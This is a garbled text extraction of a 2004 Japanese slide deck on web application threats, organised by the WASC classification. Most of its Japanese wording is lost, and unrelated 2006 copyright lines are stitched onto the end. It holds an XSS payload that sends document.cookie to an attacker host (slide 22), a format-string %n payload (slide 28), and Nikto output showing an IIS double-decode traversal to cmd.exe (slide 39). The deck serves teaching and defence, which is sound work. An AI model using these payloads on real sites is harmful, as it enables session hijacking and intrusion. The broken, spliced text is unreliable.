shio_ PDF

Size: px

Start display at page:

Download "shio_20041004.PDF"

さゆりふくだ
9 years ago
Views:

1 JPNIC JPCERT/CC 2004 Web <[email protected]>

2 Web Web Web WASC Web Application Security Consortium 7 Web Security Threat Classification Web URL 2

3 ...?? It depends!? It depends!??? 3

4 ? It depends!... 4

5 Web Web Web... Crosssite Scripting SQL... OS SYN Flood IP ARP TCP Reset

6 Web ID HTTP LDAP Web OS SQL SSI XPath WASC Web Security Threat Classification 6

7 Authentication Brute Force Insufficient Authentication Weak Password Recovery Validation 7

8 Authentication ID Web ID ID 8

9 Authentication URL URL URL... Web /admin/ Security Through Obscurity... 9

10 Authentication Web Web Web 10

11 Authorization ID Credential/Session Prediction Insufficient Authorization Insufficient Session Expiration Session Fixation 11

12 Web HTTP TCP ID ID ID ID 12

13 Authorization ID ID ID ID ID ID ID ID ID ID 13

14 ID SID:1234 SID:1235 ID SID:1235 SID:1234 SID:1234 SID:1235 SID:1235 SID:

15 Authorization URL URL URL... Security Through Obscurity... 15

16 Authorization ID Web ID... XSS back SSL 16

17 Authorization ID fix Web ID ID ID HTML URL XSS Cross-site Scripting Cookie Web ID ID Web Web ID ID ID IP 17

18 SID:1234 ID SID:1234 SID 1234 SID:1234 SID:1234 SID:1234 ID 1234 SID 1234 HTML ID SID:1234 SID

19 Client-side Attacks Web Web Content Spoofing Cross-site Scripting 19

20 Client-side Attacks Web URL URL URL Web... URL URL 20

21 Client-side Attacks XSS Web JavaScript/VBscript Web Web IE Web Cookie ID Web 21

22 Cookie Hello Joe! Cookie... =<script>document.lo cation=' /getcookie?'+document.cookie</script> Cookie... Cookie <script>document. location=' acker/getcookie?'+ document.cookie</ script> 22

23 Command Execution Web Buffer Overflow Format String Attack LDAP Injection OS Commanding SQL Injection SSI Injection XPath Injection 23

24 Command Execution C/C++ CGI C Web 24

25 25 BOF

26 Command Execution... printf() %s, %d, %x,... printf(buf); buf C/C++ CGI C %x %n 4 Web 26

27 printf("%x", 1); 1 16 printf(buf); buf "%x" 16 27

28 int i; printf("abcd%n", &i); i 4 printf(buf); buf "0xbffff658%x%x%x%x...%n" 0xbffff658 N 28

29 Command Execution LDAP LDAP LDAP Web LDAP 29

30 Command Execution OS OS Web Perl C PHP... 30

31 Command Execution SQL SQL Web Union... 31

32 Command Execution SSI SSI HTML Web HTML Web... SSI OS SSI 32

33 Command Execution XPath XPath... XML XPath XML Web 33

34 Information Disclosure Web... Directory Indexing Information Leakage Path Traversal Predictable Resource Location 34

35 Information Disclosure URL Web Apache 1.3; GET //////////... HTTP/1.0 Google Web 35

36 Information Disclosure Web HTML?... Web IP Web 36

37 Information Disclosure Traversal... Unicode UTF-8 NULL %00 OS Web 37

38 Information Disclosure....bak.old.org.orig....conf.cfg.config....dat.data... /admin/ /backup/ /logs/... 38

39 Nikto Web Nikto $ perl nikto.pl -nolookup -host Nikto 1.34/ Target IP: Target Hostname: Target Port: 80 + Start Time: Thu Sep 30 07:27: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK,UNLOCK + /<script>alert('vulnerable')</script>.shtml - Server is vulnerable to Cross Site Scripting (XSS). CA (GET)... + /blahb.ida - Reveals physical path /xxxxx.htw - Server may be vulnerable to a Webhits.dll arbitrary file retrieval /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir - IIS is vulnerable to a double-decode bug, which allows /_vti_bin/fpcount.exe - Frontpage counter CGI has been found items checked - 20 item(s) found on remote host(s) + End Time: Thu Sep 30 07:28: (46 seconds) host(s) tested 39

40 Logical Attacks Web... Web Abuse of Functionality Denial of Service Insufficient Anti-automation Insufficient Process Validation 40

41 Logical Attacks Web Web Web Web hidden Web Frontpage Server Extensions IIS WebDAV IIS hidden 41

42 Logical Attacks Web SQL Web Web 42

43 Logical Attacks Web 43

44 Logical Attacks hidden Cookie... 44

45 HTTP Response Splitting Location Web Web Server/Application Fingerprinting Cookie Web Web 45

46 ...??? ID??? SQL?... Web Web 46

47 Web...!! 47

48 WASC Web Security Threat Classification OWASP Top Ten OWASP A Guide to Building Secure Web Applications Web HTTP Response Splitting The Google Hackers Guide v1.0.pdf 48

Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved.

2006 12 14 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 2 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions,